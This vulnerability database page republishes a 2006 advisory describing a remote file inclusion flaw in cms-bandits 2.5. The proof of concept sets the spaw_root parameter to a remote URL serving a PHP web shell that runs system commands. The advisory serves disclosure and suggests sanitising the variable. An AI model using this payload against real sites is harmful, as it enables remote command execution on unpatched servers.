Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:13050
HistoryJun 09, 2006 - 12:00 a.m.

cms-bandits 2.5, Remote command execution

2006-06-0900:00:00
vulners.com
11
JSON

Advisory id: FSA:006

Author: Federico Fazzi
Date: 08/06/2006, 11:09
Sinthesis: cms-bandits 2.5, Remote command execution
Type: high
Product: http://sourceforge.net/projects/cms-bandits
Patch: unavailable

1) Description:

Error occured in td.php,

include $spaw_root.'class/util.class.php';
include $spaw_root.'class/lang.class.php';

Error occured in img.php,

include $spaw_root.'class/util.class.php';
include $spaw_root.'class/lang.class.php';

required register_global = On,
The users can include a remote file because
the $spaw_root is undeclare.

2) Proof of concept:

http://127.0.0.1/cms/dialogs/td.php?spaw_root=[cmd_with_final_slash]
http://127.0.0.1/cms/dialogs/img.php?spaw_root=[cmd_with_final_slash]
[cmd_with_final_slash] = http://example/cmd.php/
cmd.php = <?php system("commands here"); or passthru ?>

3) Solution:

sanitized the variable on img.php, td.php.

JSON